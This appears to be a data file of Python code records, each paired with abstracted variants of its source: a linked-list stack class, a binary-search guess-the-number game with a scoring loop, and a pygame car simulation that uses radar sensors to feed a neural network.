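    def __init__(self, capacity):
        self.capacity = capacity  # the tests also pass None and 0 here
        self.top = None           # head of the singly linked list
        self.count = 0

    def is_empty(self):
        return self.count == 0

    def is_full(self):
        return self.capacity is not None and self.count >= self.capacity

    def push(self, value):
        # the tests expect a push onto a full (or capacity-less) stack to raise
        if self.capacity is None or self.is_full():
            raise IndexError('push onto a full stack')
        self.top = Node(value, self.top)
        self.count += 1

    def pop(self):
        if self.is_empty():
            raise IndexError('pop from an empty stack')
        value = self.top.value
        self.top = self.top.next
        self.count -= 1
        return value

    def peek(self):
        if self.is_empty():
            raise IndexError('peek at an empty stack')
        return self.top.value

    def size(self):
        return self.count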
99,833 | 4baf3f570cc5c23ca0ab06c1454504202673716d | #!/usr/bin/env python
# coding: utf-8
# In[2]:
def game_core(number): # the most obvious and simplest approach - binary search
    count = 0
    predict = 50 # take the middle of the 0..100 interval as the first guess
    max1 = 100 # upper bound
    min1 = 0 # lower bound
    while number != predict:
        count+=1
        if number > predict:
            min1 = predict + 1 # the hidden number is larger: move the lower bound past the rejected guess (the +1 keeps the loop from stalling at number == 100)
            predict = (min1+max1) // 2 # take the middle value again
        elif number < predict:
            max1 = predict - 1 # the hidden number is smaller: move the upper bound below the rejected guess
            predict = (min1+max1) // 2 # take the middle value again
    return(count)
# In[ ]:
import numpy as np
def score_game(game_core_v1): # function that simulates the guess-the-number game
    '''Run the game repeatedly (250 runs here) to see how quickly it guesses the number'''
    count_ls = []
    np.random.seed(1) # fix the RANDOM SEED so the experiment is reproducible!
    random_array = np.random.randint(1, 101, size=(250))
    for number in random_array:
        count_ls.append(game_core_v1(number))
    score = int(np.mean(count_ls))
    print(f"Your algorithm guesses the number in {score} attempts on average")
    return(score)
score_game(game_core)
| [
"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\ndef game_core(number): #самый очевидный и простой способ - бинарный поиск\n count = 0\n predict = 50 #берем в качестве первого предположения среднее значение из интервала от 0 до 100\n max1 = 100 #верхняя граница\n min1 = 0 #нижняя граница\n while number != predict:\n count+=1\n if number > predict:\n min1 = predict #так как загаданное число больше, то предположение становится новой нижней границей поиска\n predict = (min1+max1) // 2 #снова берём среднее значение\n elif number < predict:\n max1 = predict #так как загаданное число меньше, то предположение становится новой верхней границей поиска\n predict = (min1+max1) // 2 #снова берём среднее значение\n return(count)\n\n\n# In[ ]:\n\n\nimport numpy as np\ndef score_game(game_core_v1): #функция симулирующая игру угадай число\n '''Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число'''\n count_ls = []\n np.random.seed(1) # фиксируем RANDOM SEED, чтобы эксперимент был воспроизводим!\n random_array = np.random.randint(1, 101, size=(250))\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f\"Ваш алгоритм угадывает число в среднем за {score} попыток\")\n return(score)\nscore_game (game_core)\n\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\nimport numpy as np\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\nscore_game(game_core)\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\nscore_game(game_core)\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n\n\ndef score_game(game_core_v1):\n \"\"\"Запускаем игру 1000 раз, чтоб узнать как быстро игра угадывает число\"\"\"\n count_ls = []\n np.random.seed(1)\n random_array = np.random.randint(1, 101, size=250)\n for number in random_array:\n count_ls.append(game_core_v1(number))\n score = int(np.mean(count_ls))\n print(f'Ваш алгоритм угадывает число в среднем за {score} попыток')\n return score\n\n\n<code token>\n",
"def game_core(number):\n count = 0\n predict = 50\n max1 = 100\n min1 = 0\n while number != predict:\n count += 1\n if number > predict:\n min1 = predict\n predict = (min1 + max1) // 2\n elif number < predict:\n max1 = predict\n predict = (min1 + max1) // 2\n return count\n\n\n<import token>\n<function token>\n<code token>\n",
"<function token>\n<import token>\n<function token>\n<code token>\n"
] | false |
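A quick aside on record 99,833 above: the halving strategy it implements is a binary search, and a textbook binary search over the range 1..100 needs at most ceil(log2(100)) = 7 guesses. The self-contained check below verifies that bound; it is only an illustrative sketch, not taken from the original record, and uses its own low/high bookkeeping rather than game_core's min1/max1.

import math


def guesses_needed(number, low=1, high=100):
    # Standard binary search: count how many midpoint guesses are needed.
    count = 0
    while low <= high:
        count += 1
        mid = (low + high) // 2
        if mid == number:
            return count
        if number > mid:
            low = mid + 1
        else:
            high = mid - 1
    return count


worst_case = max(guesses_needed(n) for n in range(1, 101))
assert worst_case <= math.ceil(math.log2(100))  # at most 7 guesses
print(worst_case)  # prints 7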
99,834 | 757b52dbee049c9c433ffc4cbaf5323c10a031cf | import math
import pygame as pg
from pygameUtils import rotate, calc_sides
from dotenv import load_dotenv
import os
CAR_HEIGHT = 100
CAR_WIDTH = 100
RADAR_COLOR = (0, 0, 255)
WHITE_COLOR = (255, 255, 255, 255)
load_dotenv()
class Car(object):
"""Car class for pygame simulation"""
def __init__(self, game_map):
self.game_map = game_map
self.surface = pg.image.load('red_car.png')
self.surface = pg.transform.scale(
self.surface, (CAR_WIDTH, CAR_HEIGHT)
)
self.rotate_surface = self.surface
self.x_pos = 600
self.y_pos = 655
self.angle = 0
self.speed = 7
self.distance = 0
self.collided = False
self.collision_points = []
self.radars = []
self.center = [
self.x_pos + 50, self.y_pos + 50
]
def draw(self, screen):
"""Renders the car intro the screen"""
screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])
self.draw_radar(screen)
def update(self):
"""Updates the car itself"""
#self.x_pos += dif_x
#self.y_pos += dif_y
self.distance += self.speed
#self.angle += dif_angle
self.x_pos += math.cos(math.radians(360-self.angle)) * self.speed
self.y_pos += math.sin(math.radians(360-self.angle)) * self.speed
self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]
self.rotate_surface = rotate(self.surface, self.angle)
# Clear the radars that have been used
self.update_collision_points()
self.check_collision()
self.radars.clear()
sensoresList = []
if (int(os.getenv("NUM_SENSORES")) == 3):
sensoresList = list(range(-90, 120, 90))
elif (int(os.getenv("NUM_SENSORES")) == 4):
sensoresList = list(range(-90, 120, 60))
elif (int(os.getenv("NUM_SENSORES")) == 5):
sensoresList = list(range(-90, 120, 45))
elif (int(os.getenv("NUM_SENSORES")) == 9):
sensoresList = list(range(-90, 120, 25))
elif (int(os.getenv("NUM_SENSORES")) == 11):
sensoresList = list(range(-90, 120, 20))
# Draw the radars in the given angles
for degree in sensoresList:
self.update_radar(degree)
def update_radar(self, degree):
"""Updates the car radars and appends them to its list"""
length = 0
# Calculate the x center of the car, considering its rotation
x_len = int(
self.center[0] + math.cos(
math.radians(360 - (self.angle + degree))
) * length
) # Calculate the y center of the car, considering its rotation
y_len = int(
self.center[1] + math.sin(
math.radians(360 - (self.angle + degree))
) * length
)
# Check if the pixel we want is not out of range
try:
pixel = self.game_map.get_at((x_len, y_len))
except IndexError:
pixel = WHITE_COLOR
# We have to check if one of the sides is out of the track
while pixel != WHITE_COLOR and length < 300:
try:
# Try to get the furthest pixel in the game
pixel = self.game_map.get_at((x_len, y_len))
except IndexError:
# If it fails, just set it as a white color
pixel = WHITE_COLOR
else:
# Change the length and update x and y values
length = length + 1
# Update x values
x_len = int(
self.center[0] + math.cos(
math.radians(360 - (self.angle + degree))
) * length
)
# Update y values
y_len = int(
self.center[1] + math.sin(
math.radians(360 - (self.angle + degree))
) * length
)
# Get the vertical and horizontal side of the car
horizontal = math.pow(x_len - self.center[0], 2)
vertical = math.pow(y_len - self.center[1], 2)
# If we get the hypotenuse of the triangle, we are also getting
# the distance of the radar
distance = int(math.sqrt(horizontal + vertical))
self.radars.append([(x_len, y_len), distance])
def draw_radar(self, screen):
"""Draws the radars on the screen"""
self.get_data()
for radar in self.radars:
position, _ = radar
pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)
pg.draw.circle(screen, RADAR_COLOR, position, 2)
def update_collision_points(self):
"""Calls for calc_sides method in order to get the sides of the car"""
self.collision_points = calc_sides(self.center, self.angle)
def check_collision(self):
"""Checks if one of the collision points of the car is a white pixel
which if it is, means it got out of the track"""
self.collided = False
for point in self.collision_points:
try:
if self.game_map.get_at((
int(point[0]), int(point[1])
)) == WHITE_COLOR:
self.collided = True
break
except:
self.collided = True
def get_collided(self):
"""Returns if the car has collided or not"""
return self.collided
def get_reward(self):
return self.distance/50.0
def get_data(self):
inputLayer = []
for i in range(int(os.getenv("NUM_SENSORES"))):
inputLayer.append(0)
for i, radar in enumerate(self.radars):
inputLayer[i] = int(radar[1]/30)
return inputLayer
| [
"import math\nimport pygame as pg\nfrom pygameUtils import rotate, calc_sides\nfrom dotenv import load_dotenv\nimport os\n\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = (0, 0, 255)\nWHITE_COLOR = (255, 255, 255, 255)\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(\n self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [\n self.x_pos + 50, self.y_pos + 50\n ]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n #self.x_pos += dif_x\n #self.y_pos += dif_y\n self.distance += self.speed\n #self.angle += dif_angle\n self.x_pos += math.cos(math.radians(360-self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360-self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n\n # Clear the radars that have been used\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n\n sensoresList = []\n if (int(os.getenv(\"NUM_SENSORES\")) == 3):\n sensoresList = list(range(-90, 120, 90))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 4):\n sensoresList = list(range(-90, 120, 60))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 5):\n sensoresList = list(range(-90, 120, 45))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 9):\n sensoresList = list(range(-90, 120, 25))\n elif (int(os.getenv(\"NUM_SENSORES\")) == 11):\n sensoresList = list(range(-90, 120, 20))\n\n # Draw the radars in the given angles\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n\n # Calculate the x center of the car, considering its rotation\n x_len = int(\n self.center[0] + math.cos(\n math.radians(360 - (self.angle + degree))\n ) * length\n ) # Calculate the y center of the car, considering its rotation\n y_len = int(\n self.center[1] + math.sin(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Check if the pixel we want is not out of range\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n\n # We have to check if one of the sides is out of the track\n while pixel != WHITE_COLOR and length < 300:\n\n try:\n # Try to get the furthest pixel in the game\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n # If it fails, just set it as a white color\n pixel = WHITE_COLOR\n else:\n # Change the length and update x and y values\n length = length + 1\n\n # Update x values\n x_len = int(\n self.center[0] + math.cos(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Update y values\n y_len = int(\n self.center[1] + math.sin(\n math.radians(360 - (self.angle + degree))\n ) * length\n )\n\n # Get the vertical and horizontal side of the car\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n\n # If we get the hypotenuse of the triangle, we are also getting\n # the distance of the radar\n distance = int(math.sqrt(horizontal 
+ vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n\n for point in self.collision_points:\n\n try:\n if self.game_map.get_at((\n int(point[0]), int(point[1])\n )) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance/50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv(\"NUM_SENSORES\"))):\n inputLayer.append(0)\n\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1]/30)\n return inputLayer\n",
"import math\nimport pygame as pg\nfrom pygameUtils import rotate, calc_sides\nfrom dotenv import load_dotenv\nimport os\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = 0, 0, 255\nWHITE_COLOR = 255, 255, 255, 255\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n 
self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\nCAR_HEIGHT = 100\nCAR_WIDTH = 100\nRADAR_COLOR = 0, 0, 255\nWHITE_COLOR = 255, 255, 255, 255\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n 
\"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\nload_dotenv()\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def 
get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def 
get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
